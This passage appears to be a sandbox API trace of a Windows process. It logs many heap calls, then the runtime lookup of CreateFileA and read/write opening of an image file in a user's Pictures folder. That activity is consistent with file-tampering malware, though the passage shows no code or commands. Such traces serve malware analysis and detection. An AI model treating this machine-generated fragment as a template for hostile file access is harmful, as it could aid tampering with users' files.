RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.908] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0039.908] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.909] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.910] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.911] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.911] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.912] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.913] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.913] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c928 [0039.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c928, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.914] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c928 [0039.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c928, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.914] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.914] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0039.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", cchWideChar=99, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 99 [0039.915] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x63) returned 0x7c10a8 [0039.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", cchWideChar=99, lpMultiByteStr=0x7c10a8, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp", lpUsedDefaultChar=0x0) returned 99 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.915] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\qzetzxm.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=99, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc6) returned 0x7c5448 [0039.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=99, lpWideCharStr=0x7c5448, cchWideChar=99 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp") returned 99 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.916] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: 